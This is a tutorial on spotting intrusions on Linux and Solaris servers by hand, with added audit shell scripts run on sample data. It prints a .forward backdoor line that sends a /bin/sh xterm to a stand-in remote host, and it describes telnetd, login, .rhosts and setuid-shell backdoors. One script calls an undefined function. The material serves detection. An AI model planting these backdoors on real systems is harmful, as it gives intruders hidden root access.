How do you judge whether your server has been hacked? Relying on your own two hands alone is not enough, but they can still play a part. Let's look at some intrusion detection methods on UNIX systems, taking Linux and Solaris as examples.

1, check the system password file

Start with an obvious look at the passwd file: run ls -l /etc/passwd to see the date the file was last modified.

Check which privileged users are in the passwd file: every account whose uid is 0 is a privileged user and should be listed and accounted for.


Also check whether there are any accounts with an empty password in the system.
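The two passwd checks above, as an added example that is not part of the original article: both functions read passwd/shadow-formatted text on standard input, so they can be pointed at the real files (/etc/shadow needs root) or at the constructed sample records embedded here.

```sh
#!/bin/sh
# Added example (not from the original article): audit passwd and shadow
# contents for uid-0 accounts and for accounts with an empty password field.
# Both functions read the file contents from stdin, so they run unchanged
# on /etc/passwd and /etc/shadow or on the constructed samples below.

# Print the login name of every account whose uid (3rd field) is 0.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }'
}

# Print every account whose password hash field (2nd field) is empty.
# Works on /etc/shadow, or on an old-style /etc/passwd that still carries hashes.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }'
}

# Constructed sample data: a second uid-0 account "toor" has been appended
# to passwd, and "guest" has no password at all in shadow.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/tmp/.x:/bin/sh'

SAMPLE_SHADOW='root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
alice:$6$saltsalt$hashhashhash:19000:0:99999:7:::
guest::19000:0:99999:7:::'

if [ "${1:-}" = "--live" ]; then
    echo "uid 0 accounts:";   uid0_accounts < /etc/passwd
    echo "empty passwords:";  empty_password_accounts < /etc/shadow
else
    echo "uid 0 accounts:";   printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
    echo "empty passwords:";  printf '%s\n' "$SAMPLE_SHADOW" | empty_password_accounts
fi
```

Any name other than root in the first list, and any name at all in the second, needs an explanation; compare the output against the account list you expect rather than just eyeballing /etc/passwd.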

2, check the processes to see if there are any strange ones

Focus on the process:

ps -aef | grep inetd

inetd is the Internet super-server daemon of UNIX systems. A normally started inetd has a relatively early (low) pid. If you see a process like inetd -s /tmp/.xxx, pay close attention to what follows inetd -s. Under normal circumstances the inetd service on Linux does not take a -s parameter, and inetd is never used to start a file; on Solaris inetd runs only as inetd -s and likewise does not start a specific file. If ps shows that inetd has started a file and you did not start it that way, someone has broken into your system and started a simple backdoor with root privileges.

Enter ps -aef and go through the output, paying particular attention to processes that start with ./xxx. Once you find an unfamiliar process, treat it as a backdoor program left by the intruder: immediately run kill -9 pid to kill it, then run ps -aef again to see whether the process is really gone. If such a process reappears after being killed, the system has been planted with a script that restarts the program automatically. In that case look carefully with find / -name "program name" -print; if the system really has been backdoored by the intruder, the directory where the program is found will yield a lot of interesting material.

Hiding processes under UNIX is sometimes done by replacing the ps binary itself. Checking for that is a matter of file integrity, which we discuss later. Next, follow these steps to find the intruder's files on the server.
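The process review described in this section, as an added example that is not part of the original article: the function scans ps -ef style output for the patterns the text names (inetd given a file via -s, commands launched as ./something) and, as a generalisation of the same idea, binaries running out of world-writable directories. The sample ps output is constructed; the pid values and program names in it are invented.

```sh
#!/bin/sh
# Added example, not part of the original article. Scan `ps -ef` output for
# suspicious command lines and print "pid<TAB>command" for each hit:
#   - inetd started with "-s /some/file" (not how inetd is normally run)
#   - programs started as ./something
#   - programs running from /tmp, /var/tmp or /dev/shm (world-writable)
# Column layout assumed: UID PID PPID C STIME TTY TIME CMD (GNU/Solaris ps -ef).

suspicious_processes() {
    awk '
        NR == 1 { next }                          # skip the ps header line
        {
            cmd = $8
            for (i = 9; i <= NF; i++) cmd = cmd " " $i
            hit = 0
            if (cmd ~ /(^|\/)inetd[ \t]+-s[ \t]+\//)      hit = 1   # inetd -s /path
            if (cmd ~ /^\.\//)                            hit = 1   # ./program
            if (cmd ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//) hit = 1   # world-writable dir
            if (hit) printf "%s\t%s\n", $2, cmd
        }'
}

# Constructed sample of `ps -ef` output (pids and names are invented).
SAMPLE_PS='UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 09:00 ?        00:00:01 /sbin/init
root       412     1  0 09:00 ?        00:00:00 /usr/sbin/inetd
root       980     1  0 09:05 ?        00:00:00 inetd -s /tmp/.xxx
alice     1201  1200  0 09:10 pts/0    00:00:00 -bash
alice     1344  1201  0 09:12 pts/0    00:00:00 ./bd -p 31337
root      1402     1  0 09:13 ?        00:00:00 /dev/shm/.x/httpd'

if [ "${1:-}" = "--live" ]; then
    ps -ef | suspicious_processes
else
    printf '%s\n' "$SAMPLE_PS" | suspicious_processes
fi
```

Remember the caveat from the text: if ps itself has been replaced, nothing piped through it can be trusted, so treat this as a first pass and verify the ps binary's integrity as described in section 8.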

3, check the system daemon

Check the /etc/inetd.conf file by typing: cat /etc/inetd.conf | grep -v "^#". The output lists the remote services your machine is running.

An intruder can create a backdoor simply by replacing one of the in.xxx programs. For example, if in.telnetd is replaced with /bin/sh and the inetd service is restarted, every user who telnets to the server gets a root shell directly, without entering a username and password at all.

4, check network connections and listening ports

Enter netstat -an to list all connections and listening ports of the machine, and look for any connections that should not be there.

Enter netstat -rn to check whether the routing and gateway settings of this machine are correct.

Enter ifconfig -a to see the network interface settings.

5, check the system log

Under normal conditions the command last | more shows the login history of all users of the machine. But the last command relies on the syslog process, which has become an important target for intruders. An intruder usually stops the system's syslog, so check the status of the syslog process and determine whether syslog was started normally. Because syslog runs as root, finding that syslog has been tampered with indicates a major intrusion event.

Enter ls -al /var/log under Linux.

Enter ls -al /var/adm under Solaris.

Check the integrity and modification times of wtmp, utmp and files such as messages; these are also the files an intruder edits by hand to erase the traces of the intrusion.

6, check for core files in the system

Breaking into a system by sending a malformed request to one of the server's services is a conventional intrusion method; the typical example is the RPC attack. This method has only a certain success rate, that is, it does not guarantee a 100% successful intrusion, and it usually leaves a core file in the corresponding directory on the server. Search the whole system for core files with: find / -name core -exec ls -l {} \; Then, according to the directory in which each core was found, examine the core file to determine whether there was an intrusion.

7, .rhosts and .forward

These are two well-known backdoor files. To check whether an intruder has planted them on your system, search for both files globally:

find / -name ".rhosts" -print

find / -name ".forward" -print

A .rhosts file under a user's $HOME that contains nothing but two + signs (+ +) is very dangerous. If port 513 (rlogin, a service similar to telnet) is open on your system, anyone can then log in to your system as that user without any authentication.

Putting a command in a .forward file is a common way to regain access under Unix. A user's $HOME/.forward may be set up as follows:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

A variant of this method changes the system's mail alias file (usually /etc/aliases). Note that this is only a simple transformation; more advanced variants run small scripts from .forward that execute arbitrary commands read from standard input (with a little preprocessing). Using smrsh effectively stops this backdoor (although if you allow users to run filters such as elm's filter or procmail-type programs, there is probably still a problem). Under Solaris, if you run the following command:

ln -s /var/mail/luser ~/.forward

and then enable vacation, /var/mail/luser is copied to ~/.forward and "|/usr/bin/vacation me" is appended to it. The old symlink is moved to ~/.forward..BACKUP. It is also possible to simply delete these two files.
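Inspecting what the two find commands above return, as an added example that is not part of the original article: check_rhosts reports wildcard (+) trust entries, check_forward reports entries that pipe mail into a command and .forward files that are symbolic links (the Solaris vacation trick above). The files created in the demo are constructed stand-ins, and the piped command path in them is invented.

```sh
#!/bin/sh
# Added example, not from the original article. The search itself is the
# article's find commands; these functions examine the files that find
# returns. Both take a single file path as their argument.

# Report .rhosts lines whose host or user field is the "+" wildcard.
check_rhosts() {       # usage: check_rhosts /home/user/.rhosts
    awk -v f="$1" '
        /^[[:space:]]*#/ || NF == 0 { next }
        $1 == "+" || $2 == "+" { printf "%s: wildcard trust entry \"%s\"\n", f, $0 }
    ' "$1"
}

# Report a .forward that is a symlink, and every line that pipes mail
# into a program ("|" is what makes sendmail execute a command).
check_forward() {      # usage: check_forward /home/user/.forward
    if [ -L "$1" ]; then
        echo "$1: is a symbolic link -> $(readlink "$1")"
    fi
    grep -n '|' "$1" 2>/dev/null | sed "s|^|$1: pipes mail to a command at line |"
    return 0
}

# Demo on constructed files (the piped program path is invented).
demo_rhosts_forward() {
    dir=$(mktemp -d)
    printf '+ +\n' > "$dir/.rhosts"
    printf '\\luser|"/tmp/.x/run"\n' > "$dir/.forward"
    check_rhosts "$dir/.rhosts"
    check_forward "$dir/.forward"
    rm -rf "$dir"
}

if [ "${1:-}" = "--live" ]; then
    # Walk every home directory; errors for unreadable dirs are dropped.
    for f in /home/*/.rhosts /root/.rhosts;   do [ -e "$f" ] && check_rhosts "$f";  done
    for f in /home/*/.forward /root/.forward; do [ -e "$f" ] && check_forward "$f"; done
else
    demo_rhosts_forward
fi
```

A .forward that only lists a forwarding address, and a .rhosts that names a specific host and user, produce no output; anything these functions print deserves a look before the file is removed.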

8, check system file integrity

There are several ways to check the integrity of a file. Usually we inspect a file with ls -l filename and compare the result. This method is simple but still has some practical value; if ls itself has been replaced, however, things get more troublesome. On Linux you can run rpm -V `rpm -qf filename` and judge from whether the result is normal whether the file is intact. There are many ways to check file integrity with rpm under Linux; I won't go into details here, you can get more formats from man rpm.

In UNIX systems, /bin/login is a file that intruders often replace as a backdoor. Next, let's talk about the login backdoor:

In UNIX, the login program is usually used to authenticate telnet users. The intruder obtains the source code of login and modifies it so that, when comparing the entered password with the stored one, it checks for a backdoor password first. If the user types the backdoor password, the password set by the administrator is ignored and the intruder walks straight in: this lets the intruder enter any account, even root. Because the backdoor password grants access before the user is actually logged in and recorded in utmp and wtmp, the intruder can log in and get a shell without exposing the account. Once administrators noticed this backdoor, they used the "strings" command to search the login binary for text, and in many cases the backdoor password was revealed. Intruders then started encrypting or otherwise hiding the password, defeating the strings command. So many administrators now use MD5 checksums to detect such backdoors. UNIX systems have the md5sum command: entering md5sum filename prints the MD5 signature of the file. It is used in the following forms: md5sum -b reads the file in binary mode; md5sum -c checks files against a previously recorded list of MD5 signatures; md5sum -t reads the file in text mode.
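The MD5 baseline-and-verify routine the paragraph recommends, as an added example that is not part of the original article: record checksums of the binaries you care about while the system is known-good, keep that list off the host, and later run md5sum -c against it. The files in the demo are constructed stand-ins for /bin/login and /bin/ps, not real binaries.

```sh
#!/bin/sh
# Added example, not from the original article: record MD5 checksums of a
# set of files and later verify them with `md5sum -c`, the check the text
# recommends for a replaced /bin/login. The demo files are constructed.

# make_baseline BASELINE_FILE path... : store "hash  path" lines.
make_baseline() {
    out=$1; shift
    md5sum "$@" > "$out"
}

# verify_baseline BASELINE_FILE : print the path of every file whose hash
# no longer matches (or that can no longer be read); print nothing when
# everything still matches.
verify_baseline() {
    md5sum -c "$1" 2>/dev/null | grep -v ': OK$' | sed 's/: .*//'
    return 0
}

# Demo: baseline two constructed "binaries", then simulate an intruder
# replacing login and show that only login is reported.
demo_integrity_check() {
    dir=$(mktemp -d)
    printf 'original login binary\n' > "$dir/login"
    printf 'original ps binary\n'    > "$dir/ps"
    make_baseline "$dir/baseline.md5" "$dir/login" "$dir/ps"
    printf 'trojaned login binary\n' > "$dir/login"    # the replacement
    verify_baseline "$dir/baseline.md5"
    rm -rf "$dir"
}

if [ "${1:-}" = "--baseline" ]; then
    # e.g. ./this.sh --baseline /root/bins.md5 /bin/login /bin/ps /usr/sbin/in.telnetd
    shift; make_baseline "$@"
elif [ "${1:-}" = "--verify" ]; then
    verify_baseline "$2"
else
    demo_integrity_check
fi
```

The baseline is only as trustworthy as its storage and the md5sum binary that reads it: keep the list on read-only or off-host media, and verify md5sum itself with a copy taken from installation media, otherwise an intruder who can replace login can also replace the checker.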

As mentioned in the section on the daemon, the uncommented lines of the daemon configuration file inetd.conf should be compared carefully. As a simple example, if the telnet service is enabled, the configuration file will contain a line like: telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

You can see that the program it runs is /usr/sbin/in.telnetd; check the integrity of that file, because intruders often create a backdoor for themselves by replacing the service programs that the daemon configuration allows.
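The inetd.conf review from section 3 and the comparison of uncommented lines described here, as one added example that is not part of the original article: inetd_servers lists the program behind each active service, and flag_inetd_servers reports programs that are shells or live outside the usual system directories. The sample inetd.conf is constructed; the allowed directory list is an assumption to adapt to your own system.

```sh
#!/bin/sh
# Added example, not part of the original article. Lists the active
# (uncommented) services in an inetd.conf and flags server programs that
# are shells or live outside the directories where service programs are
# expected (an assumed list: adjust it for your own system).

# Print "service program" for every active line. Field layout assumed:
# service socket proto wait user server-program args... ; "internal"
# services (echo, chargen, ...) have no program and are skipped.
inetd_servers() {
    grep -v '^[[:space:]]*#' | awk 'NF >= 6 && $6 != "internal" { print $1, $6 }'
}

# Read "service program" pairs on stdin and print the ones that look wrong.
flag_inetd_servers() {
    while read -r service program; do
        [ -n "$service" ] || continue
        case "$program" in
            /bin/sh|/bin/bash|/bin/csh|/bin/ksh|/usr/bin/sh)
                echo "$service: server is a shell ($program)" ;;
            /usr/sbin/*|/usr/libexec/*|/usr/lib/*|/usr/etc/*|/usr/bin/*)
                ;;   # expected locations, nothing to report
            *)
                echo "$service: server in unusual location ($program)" ;;
        esac
    done
}

# Constructed sample configuration: telnet is legitimate, pop3 has been
# pointed at a shell, and an extra service runs a program from /tmp.
SAMPLE_INETD_CONF='# /etc/inetd.conf (constructed sample)
echo    stream  tcp     nowait  root    internal
#ftp    stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd
pop3    stream  tcp     nowait  root    /bin/sh sh -i
ingreslock stream tcp   nowait  root    /tmp/.xxx/bd bd'

if [ "${1:-}" = "--live" ]; then
    inetd_servers < /etc/inetd.conf | flag_inetd_servers
    # Checksums of the legitimate server programs, for the md5sum -c baseline:
    inetd_servers < /etc/inetd.conf | awk '{ print $2 }' | sort -u | xargs md5sum
else
    printf '%s\n' "$SAMPLE_INETD_CONF" | flag_inetd_servers_demo 2>/dev/null \
        || printf '%s\n' "$SAMPLE_INETD_CONF" | inetd_servers | flag_inetd_servers
fi
```

A legitimate-looking entry such as the telnet line is exactly the case the text warns about: the path is right, so only a checksum comparison of /usr/sbin/in.telnetd against a known-good baseline can tell whether the program behind it was replaced.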

/etc/crontab on Linux is also a file that intruders often make use of. To check its integrity, simply cat /etc/crontab and read the file carefully for entries an intruder may have added to run other things.

Starting the backdoor directly as a process, without replacing a file such as login, has a defect: once the system reboots the process is gone, so the backdoor has to be started at boot time. So check the files under /etc/rc.d to see whether the system starts a backdoor program at startup; isn't this method rather like checking for trojans under Windows?

Having said that, if you find a file in some directory with attributes like -rwsr-xr-x 1 root root xxx .sh, it means any user who gets onto the system can obtain a root shell by running it. This is a setuid file. Run find / -perm -4000 -print to find such files across the whole system, and then delete the ones that should not be there.
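The setuid sweep just described, as an added example that is not part of the original article: rather than deleting every setuid file the find returns (su and passwd are setuid by design), compare the list against an allow-list of the setuid programs you know the system ships with. The directory tree and allow-list in the demo are constructed.

```sh
#!/bin/sh
# Added example, not from the original article: list setuid files under a
# directory tree and report those not on an allow-list of known setuid
# programs. Run against / on a real host; the demo builds a constructed tree.

# find_setuid ROOT : every regular file under ROOT with the setuid bit set.
find_setuid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# unexpected_setuid ROOT ALLOWLIST : setuid files not listed in ALLOWLIST
# (one path per line, relative to ROOT, e.g. "bin/su").
unexpected_setuid() {
    root=$1; allow=$2
    find_setuid "$root" | sed "s|^$root/||" | grep -vxF -f "$allow"
    return 0
}

# Demo: a constructed tree with one legitimate setuid binary (bin/su),
# one planted setuid shell under tmp, and one ordinary file.
demo_setuid_scan() {
    tree=$(mktemp -d)
    mkdir -p "$tree/bin" "$tree/tmp/.x"
    printf '#!/bin/sh\n' > "$tree/bin/su";     chmod 4755 "$tree/bin/su"
    printf '#!/bin/sh\n' > "$tree/tmp/.x/sh";  chmod 4755 "$tree/tmp/.x/sh"
    printf '#!/bin/sh\n' > "$tree/bin/ls";     chmod 755  "$tree/bin/ls"
    printf 'bin/su\n' > "$tree/allow.txt"
    unexpected_setuid "$tree" "$tree/allow.txt"
    rm -rf "$tree"
}

if [ "${1:-}" = "--live" ]; then
    # e.g. ./this.sh --live /root/setuid-allow.txt  (paths relative to /, such as usr/bin/passwd)
    unexpected_setuid / "$2"
else
    demo_setuid_scan
fi
```

Build the allow-list from a freshly installed system of the same release, and re-run the scan after every package update so that legitimate new setuid binaries are added deliberately rather than ignored.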

9, check for kernel-level backdoors

If your system has this kind of backdoor installed it is usually a real nuisance; I often think that in this case reinstalling the system is the answer. Back to business: first, check the modules the system has loaded. Use the lsmod command on Linux and the modinfo command on Solaris. It should be explained that a default Linux installation loads relatively few modules, usually just the network card driver; Solaris loads many, and there is no other way than to analyse them one by one. After hardening the kernel you should disable inserting and removing modules to protect the security of the system, otherwise an intruder will be able to replace system calls again. We can do this by replacing create_module() and delete_module().

In addition, the kernel should be hardened as early as possible to prevent system calls from being replaced by intruders. If the system has backdoor modules loaded but you cannot see them in the module list /proc/modules, a hacking tool may have been used to remove the loaded modules from the list; the well-known knark toolkit includes tools that do this. In that case you need to look through the /proc directory carefully and judge hidden and disguised processes from the files you find and from experience. The knark backdoor module lives in the /proc/knark directory, although this directory may itself be hidden.
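Comparing the loaded-module list against a known-good baseline, as an added example that is not part of the original article: the functions read lsmod-style text (header line, module name in the first column), so the baseline is taken with lsmod right after installation and the same command is compared against it later. The two module listings embedded here are constructed; the module named knark is the toolkit the text mentions.

```sh
#!/bin/sh
# Added example, not from the original article: compare the module list of
# a running kernel against a baseline taken when the system was known-good,
# and print modules that have appeared since. Input is lsmod-style text
# ("Module Size Used by" header, module name in column 1).

# module_names : lsmod output on stdin -> sorted module names, one per line.
module_names() {
    awk 'NR > 1 { print $1 }' | sort
}

# new_modules BASELINE_FILE : read current lsmod output on stdin and print
# the modules present now that are absent from the (sorted) baseline.
new_modules() {
    module_names | comm -13 "$1" -
}

# Constructed lsmod listings: the baseline, and a later state where one
# module has appeared.
BASELINE_LSMOD='Module                  Size  Used by
e1000                  98304  0
ext4                  737280  1'

CURRENT_LSMOD='Module                  Size  Used by
e1000                  98304  0
ext4                  737280  1
knark                  16384  0'

demo_module_check() {
    b=$(mktemp)
    printf '%s\n' "$BASELINE_LSMOD" | module_names > "$b"
    printf '%s\n' "$CURRENT_LSMOD"  | new_modules "$b"
    rm -f "$b"
}

if [ "${1:-}" = "--baseline" ]; then
    lsmod | module_names > "$2"          # e.g. --baseline /root/modules.base
elif [ "${1:-}" = "--check" ]; then
    lsmod | new_modules "$2"             # e.g. --check /root/modules.base
else
    demo_module_check
fi
```

This catches a module that was added openly; it cannot catch one that has unlinked itself from the module list, which is exactly the knark case the text describes, so an empty result is necessary but not sufficient, and the /proc inspection above still applies.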

10. Defects in manual intrusion detection

I have described some methods of manual intrusion detection, but these methods have certain defects, some of them unavoidable, which is why manual detection is called "physical labour". Let's look at these defects:

1) Manual intrusion detection can only be host-based, which means all the detection work can only be done inside the operating system; this is its inherent defect, and basically no intrusion that happens beyond the operating system can be detected. Network-level intrusions, and intrusions and attacks on switches and routers, cannot be known to the server's operating system; once information has left the host, if it is intercepted on the transmission medium the host's operating system never notices.

2) Manual intrusion detection requires proficiency with the operating system and a vulnerability database that is refreshed quickly; you have to be a hacker while doing network administration. It is fair to say that accumulated experience can never keep up with the pace at which vulnerabilities appear in the world, so it is difficult to ensure the system is not invaded through new vulnerabilities.

3) Manual intrusion detection is only "after the fact": the intrusion event is judged from a given situation, and corresponding responses and preventive measures are taken afterwards. It cannot instead describe the attack from the intruder's probing behaviour, define the level of the event, and prevent the next intrusion without hindering the normal operation of the system.

4) Some vulnerabilities on the host can be discovered through manual intrusion detection and corresponding security measures taken. But it cannot avoid one phenomenon: it is unable to prevent a second intruder from exploiting the same vulnerability to attack the host, that is, it cannot recognise the attack pattern and cut off the intrusion.

5) In summary, manual intrusion detection is only a stopgap for system security; it relies mostly on the skills and experience of administrators to enhance security and cannot form a real security system. Although it is better than nothing and can detect and track certain intrusions, it is hard to catch the trail of an intruder who is equally proficient with the system.

11. Comparison of intrusion detection systems

Building a true security system requires an intrusion detection system, an IDS. An excellent intrusion detection system, complemented by the skills and experience of the system administrator, can form a true security system, effectively judge and cut off intrusions, and truly protect the host and its data. People sometimes think that ISS's RealSecure is an excellent intrusion detection system. In fact RealSecure has certain flaws, quite apart from its false positives, false negatives and mis-reports. First, it is English-language software, which makes it hard to use and get familiar with. And because it is foreign software, many hackers have studied RealSecure in depth and discovered some of its vulnerabilities, even inherent ones; I have tested some of these attacks against RealSecure myself.

Moreover, RealSecure also sits on top of the server's operating system: when the operating system stops working, so does it. Put very simply, the attacker's target is often RealSecure itself. Imagine: if your system relies on an intrusion detection system and that system is taken over by an attacker, your system opens its doors wide, and the consequences will be disastrous.
